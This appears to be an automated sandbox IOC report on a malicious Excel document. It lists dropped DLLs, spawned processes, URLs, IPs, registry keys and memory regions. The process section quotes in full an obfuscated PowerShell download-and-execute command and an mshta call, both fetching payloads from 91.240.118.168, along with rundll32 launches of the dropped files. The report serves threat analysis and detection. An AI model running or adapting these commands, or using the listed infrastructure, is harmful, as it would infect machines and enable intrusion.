IOC Report

loading gif

Files

File Path
Type
Category
Malicious
80_513972285.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
initial sample
malicious
C:\ProgramData\QWER.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\80_513972285.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\3DBB.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF33AC78DEA2F7DEBE.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFD5CC603F304DA47F.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msge (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5S79XMEXB2FN0C1X28V.temp
data
dropped
C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd /c mshta http://91.240.118.168/qqw/aas/se.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.168/qqw/aas/se.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
malicious
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://kuyporn.com/wp-content/XS
unknown
malicious
http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlMuzL
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlWinSta0
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlfunction
unknown
malicious
https://grupomartinsanchez.com/w
unknown
malicious
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlv1.0
unknown
malicious
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
unknown
malicious
https://elroieyecentre.org/cgi-b
unknown
malicious
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
unknown
malicious
http://jeffreylubin.igclout.com/wp-admin/vzOG/
74.208.236.157
malicious
http://91.240.11
unknown
malicious
http://kuyporn.com/wp-content/XSs5/
172.67.149.209
malicious
http://docs-construction.com/wp-admin/JJEf0kEA5/
unknown
malicious
http://flybustravel.com/cgi-bin/2TjUH/
unknown
malicious
http://wallacebradley.com/css/Yc
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlXtrP
unknown
malicious
http://91.240.118.168/qqw/aas/se.pngPE3
unknown
malicious
http://wallacebradley.com/css/YcDc927SJR/
unknown
malicious
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
unknown
malicious
https://algzor.com/wp-includes/g
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlEtrM
unknown
malicious
http://wallacebradley.com/css/YcDc927SJR/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlA(
unknown
malicious
https://bluwom-milano.com/wp-content/FEj3y4z/
unknown
malicious
https://esaci-egypt.com/wp-includes/W7qXVeGp/
unknown
malicious
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlO(
unknown
malicious
http://kuyporn.com
unknown
malicious
http://flybustravel.com/cgi-bin/2TjUH/PE3
unknown
malicious
http://kuyporn.com/wp-content/XSs5/PE3
unknown
malicious
http://91.240.118.168/qqw/aas/se.html
91.240.118.168
malicious
http://91.240.118.168/qqw/aas/se.htmlB
unknown
malicious
https://bluwom-milano.com/wp-con
unknown
malicious
https://bluwom-milano.com/wp-content/FEj3y4z/PE3
unknown
malicious
http://jeffreylubin.igclout.com
unknown
malicious
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
unknown
malicious
http://91.240.118.168/qqw/aas/se
unknown
malicious
http://91.240.118.168/qqw/aas/se.png
91.240.118.168
malicious
https://thaireportchannel.com/wp
unknown
malicious
http://jeffreylubin.igclout.com/
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlC:
unknown
malicious
http://flybustravel.com/cgi-bin/
unknown
malicious
http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
unknown
malicious
https://esaci-egypt.com/wp-inclu
unknown
malicious
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
unknown
malicious
http://91.240.118.168
unknown
malicious
https://algzor.com/wp-includes/ghFXVrGLEh/PE3
unknown
malicious
https://algzor.com/wp-includes/ghFXVrGLEh/
unknown
malicious
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
unknown
malicious
http://91.240.118.168/qqw/aas/se.htmlmshta
unknown
malicious
https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
unknown
malicious
https://pcovestudio.com/wp-admin
unknown
malicious
https://algzor.c
unknown
http://kuyporn.c
unknown
http://www.protware.com/
unknown
http://docs-construction.com/wp-
unknown
https://www.cloudflare.com/5xx-error-landing
unknown
http://www.protware.com
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://www.piriform.com/ccleaner
unknown
There are 53 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
kuyporn.com
172.67.149.209
malicious
jeffreylubin.igclout.com
74.208.236.157

IPs

IP
Domain
Country
Malicious
207.148.81.119
unknown
United States
malicious
104.131.62.48
unknown
United States
malicious
198.199.98.78
unknown
United States
malicious
194.9.172.107
unknown
unknown
malicious
59.148.253.194
unknown
Hong Kong
malicious
74.207.230.120
unknown
United States
malicious
103.41.204.169
unknown
Indonesia
malicious
85.214.67.203
unknown
Germany
malicious
191.252.103.16
unknown
Brazil
malicious
168.197.250.14
unknown
Argentina
malicious
185.148.168.15
unknown
Germany
malicious
66.42.57.149
unknown
United States
malicious
91.240.118.168
unknown
unknown
malicious
139.196.72.155
unknown
China
malicious
217.182.143.207
unknown
France
malicious
203.153.216.46
unknown
Indonesia
malicious
159.69.237.188
unknown
Germany
malicious
116.124.128.206
unknown
Korea Republic of
malicious
37.59.209.141
unknown
France
malicious
78.46.73.125
unknown
Germany
malicious
210.57.209.142
unknown
Indonesia
malicious
172.67.149.209
kuyporn.com
United States
malicious
185.148.168.220
unknown
Germany
malicious
54.37.228.122
unknown
France
malicious
185.168.130.138
unknown
Ukraine
malicious
190.90.233.66
unknown
Colombia
malicious
142.4.219.173
unknown
Canada
malicious
54.38.242.185
unknown
France
malicious
195.154.146.35
unknown
France
malicious
195.77.239.39
unknown
Spain
malicious
78.47.204.80
unknown
Germany
malicious
118.98.72.86
unknown
Indonesia
malicious
37.44.244.177
unknown
Germany
malicious
62.171.178.147
unknown
United Kingdom
malicious
128.199.192.135
unknown
United Kingdom
malicious
74.208.236.157
jeffreylubin.igclout.com
United States
There are 26 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
p %
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2DE0F
2DE0F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{d%
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\345F5
345F5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34C9A
34C9A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 60 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
460000
trusted library allocation
page execute and read and write
malicious
2ED1000
trusted library allocation
page execute read
malicious
2841000
trusted library allocation
page execute read
malicious
3061000
trusted library allocation
page execute read
malicious
26D0000
trusted library allocation
page execute and read and write
malicious
200000
trusted library allocation
page execute and read and write
malicious
4C1000
trusted library allocation
page execute read
malicious
23C1000
trusted library allocation
page execute read
malicious
4F0000
trusted library allocation
page execute and read and write
malicious
31C1000
trusted library allocation
page execute read
malicious
380000
trusted library allocation
page execute and read and write
malicious
2891000
trusted library allocation
page execute read
malicious
180000
trusted library allocation
page execute and read and write
malicious
3E1000
trusted library allocation
page execute read
malicious
190000
trusted library allocation
page execute and read and write
malicious
1A0000
trusted library allocation
page execute and read and write
malicious
611000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2170000
trusted library allocation
page execute and read and write
malicious
2890000
trusted library allocation
page execute and read and write
malicious
2740000
trusted library allocation
page execute and read and write
malicious
4F0000
trusted library allocation
page execute and read and write
malicious
27A1000
trusted library allocation
page execute read
malicious
300000
trusted library allocation
page execute and read and write
malicious
3190000
trusted library allocation
page execute and read and write
malicious
2950000
trusted library allocation
page execute and read and write
malicious
3030000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
28C1000
trusted library allocation
page execute read
malicious
2701000
trusted library allocation
page execute read
malicious
2810000
trusted library allocation
page execute and read and write
malicious
2E10000
trusted library allocation
page execute and read and write
malicious
2130000
trusted library allocation
page execute and read and write
malicious
471000
trusted library allocation
page execute read
malicious
2080000
trusted library allocation
page execute and read and write
malicious
2E00000
trusted library allocation
page execute and read and write
malicious
26B1000
trusted library allocation
page execute read
malicious
23F0000
unkown
page execute and read and write
malicious
341000
trusted library allocation
page execute read
malicious
331000
trusted library allocation
page execute read
malicious
6C1000
trusted library allocation
page execute read
malicious
3161000
trusted library allocation
page execute read
malicious
2491000
trusted library allocation
page execute read
malicious
661000
trusted library allocation
page execute read
malicious
2730000
trusted library allocation
page execute and read and write
malicious
27A0000
trusted library allocation
page execute and read and write
malicious
2891000
unkown
page execute read
malicious
421000
trusted library allocation
page execute read
malicious
2340000
trusted library allocation
page execute and read and write
malicious
2DC1000
trusted library allocation
page execute read
malicious
1C0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
630000
trusted library allocation
page execute and read and write
malicious
431000
trusted library allocation
page execute read
malicious
2161000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2280000
trusted library allocation
page execute and read and write
malicious
441000
trusted library allocation
page execute read
malicious
330000
trusted library allocation
page execute and read and write
malicious
261000
trusted library allocation
page execute read
malicious
27C1000
trusted library allocation
page execute read
malicious
28A1000
trusted library allocation
page execute read
malicious
2101000
trusted library allocation
page execute read
malicious
190000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
28F0000
unkown
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2831000
trusted library allocation
page execute read
malicious
3151000
trusted library allocation
page execute read
malicious
2860000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2870000
trusted library allocation
page execute and read and write
malicious
1C1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2E10000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2BB0000
heap
page read and write
3190000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
36E6000
trusted library allocation
page read and write
B20000
heap
page read and write
2907000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
39B9000
trusted library allocation
page read and write
3139000
trusted library allocation
page read and write
10000000
unkown
page readonly
124000
heap
page read and write
28E5000
trusted library allocation
page read and write
285000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
8F2E000
trusted library allocation
page read and write
3B15000
trusted library allocation
page read and write
49F000
stack
page read and write
28E1000
trusted library allocation
page read and write
430000
trusted library allocation
page read and write
704000
heap
page read and write
2904000
trusted library allocation
page read and write
353C000
heap
page read and write
5AA9000
heap
page read and write
31EF000
trusted library allocation
page read and write
290E000
stack
page read and write
3015000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
33DA000
trusted library allocation
page read and write
3197000
trusted library allocation
page read and write
2880000
trusted library allocation
page read and write
324000
heap
page read and write
35CA000
heap
page read and write
900000
heap
page read and write
3787000
trusted library allocation
page read and write
744000
heap
page read and write
3E0000
trusted library allocation
page read and write
5A93000
heap
page read and write
2B9D000
trusted library allocation
page read and write
343000
heap
page read and write
3EA000
heap
page read and write
835E000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
298000
heap
page read and write
556B000
heap
page read and write
10000
heap
page read and write
841E000
trusted library allocation
page read and write
3619000
heap
page read and write
2B93000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
3378000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
3F0000
heap
page read and write
8EEE000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
3563000
heap
page read and write
320E000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
3170000
trusted library allocation
page read and write
2190000
heap
page read and write
5A93000
heap
page read and write
466000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
2A1000
heap
page read and write
39B9000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
3B1F000
trusted library allocation
page read and write
33AE000
trusted library allocation
page read and write
6F0000
heap
page read and write
12FE1000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
3AFB000
trusted library allocation
page read and write
35C9000
heap
page read and write
3580000
heap
page read and write
24B6000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
370000
trusted library section
page read and write
B00000
heap
page read and write
326B000
trusted library allocation
page read and write
3211000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
35D8000
heap
page read and write
220000
heap
page read and write
28E1000
trusted library allocation
page read and write
5A8A000
heap
page read and write
416000
heap
page read and write
28F0000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2380000
heap
page read and write
2FF0000
trusted library allocation
page read and write
10000
heap
page read and write
2ECE000
stack
page read and write
28F0000
trusted library allocation
page read and write
357000
heap
page read and write
2866000
heap
page read and write
24E0000
trusted library allocation
page read and write
3551000
heap
page read and write
316A000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
3159000
trusted library allocation
page read and write
470000
trusted library allocation
page read and write
24B000
stack
page read and write
2B99000
trusted library allocation
page read and write
3B51000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
58C5000
heap
page read and write
3B0D000
trusted library allocation
page read and write
6B0000
heap
page read and write
3B0A000
trusted library allocation
page read and write
16A000
stack
page read and write
3169000
trusted library allocation
page read and write
7FF00290000
trusted library allocation
page execute and read and write
28C4000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
902E000
trusted library allocation
page read and write
35D8000
heap
page read and write
5A56000
heap
page read and write
414000
heap
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
6F8000
heap
page read and write
3B1E000
trusted library allocation
page read and write
2502000
heap
page read and write
2907000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
46E000
heap
page read and write
3E2000
heap
page read and write
2907000
trusted library allocation
page read and write
37A3000
trusted library allocation
page read and write
2BA9000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
381E000
trusted library allocation
page read and write
5A68000
heap
page read and write
2907000
trusted library allocation
page read and write
22D0000
heap
page read and write
3790000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
4510000
heap
page read and write
267000
heap
page read and write
3C05000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page read and write
288E000
stack
page read and write
8EFE000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
316C000
trusted library allocation
page read and write
35BF000
heap
page read and write
4F48000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
3B11000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
3CD000
heap
page read and write
339F000
stack
page read and write
74C000
heap
page read and write
3309000
trusted library allocation
page read and write
1CA23000
heap
page read and write
357D000
heap
page read and write
5525000
heap
page read and write
190000
heap
page read and write
A90000
heap
page read and write
8D6E000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page execute and read and write
2EA5000
trusted library allocation
page read and write
10B000
heap
page read and write
317A000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page read and write
664000
heap
page read and write
10000
heap
page read and write
2FA0000
trusted library allocation
page read and write
3538000
heap
page read and write
354D000
heap
page read and write
326B000
trusted library allocation
page read and write
1F6000
heap
page read and write
3251000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
AF0000
heap
page read and write
12E71000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
28B4000
trusted library allocation
page read and write
87DE000
trusted library allocation
page read and write
120000
heap
page read and write
28C4000
trusted library allocation
page read and write
35BA000
heap
page read and write
554E000
heap
page read and write
660000
trusted library allocation
page read and write
10046000
unkown
page readonly
31C7000
trusted library allocation
page read and write
3256000
trusted library allocation
page read and write
414000
heap
page read and write
2670000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
900000
heap
page read and write
3001000
trusted library allocation
page read and write
1F35000
heap
page read and write
210000
heap
page read and write
326B000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2F8000
heap
page read and write
30BF000
trusted library allocation
page read and write
90AE000
trusted library allocation
page read and write
3584000
heap
page read and write
33D000
heap
page read and write
354D000
heap
page read and write
3BA5000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
10000
heap
page read and write
3B0D000
trusted library allocation
page read and write
3AFB000
trusted library allocation
page read and write
24F2000
heap
page read and write
686000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
31A8000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
35AC000
heap
page read and write
3B04000
trusted library allocation
page read and write
7FF0002C000
trusted library allocation
page execute and read and write
2960000
trusted library allocation
page read and write
465000
trusted library allocation
page read and write
27A0000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
2F5E000
stack
page read and write
279D000
stack
page read and write
21C0000
trusted library allocation
page read and write
31B9000
trusted library allocation
page read and write
21B0000
heap
page read and write
3B17000
trusted library allocation
page read and write
413000
heap
page read and write
33A4000
trusted library allocation
page read and write
293D000
stack
page read and write
2907000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
2BA4000
trusted library allocation
page read and write
326C000
trusted library allocation
page read and write
31D0000
heap
page read and write
28E1000
trusted library allocation
page read and write
2EB000
heap
page read and write
31C7000
trusted library allocation
page read and write
3086000
trusted library allocation
page read and write
22E0000
trusted library allocation
page read and write
42E000
heap
page read and write
5A72000
heap
page read and write
314E000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
35B4000
trusted library allocation
page read and write
2470000
heap
page read and write
1E9D000
stack
page read and write
2890000
unkown
page read and write
25C0000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
255F000
stack
page read and write
3B1A000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page read and write
10057000
unkown
page read and write
28F0000
trusted library allocation
page read and write
10053000
unkown
page read and write
407000
heap
page read and write
40F000
heap
page read and write
2E4000
heap
page read and write
758000
heap
page read and write
440000
trusted library allocation
page read and write
556B000
heap
page read and write
3255000
trusted library allocation
page read and write
8F4E000
trusted library allocation
page read and write
2CE000
heap
page read and write
28E1000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
1F6B000
heap
page read and write
10053000
unkown
page read and write
3777000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
405000
trusted library allocation
page read and write
2A4F000
stack
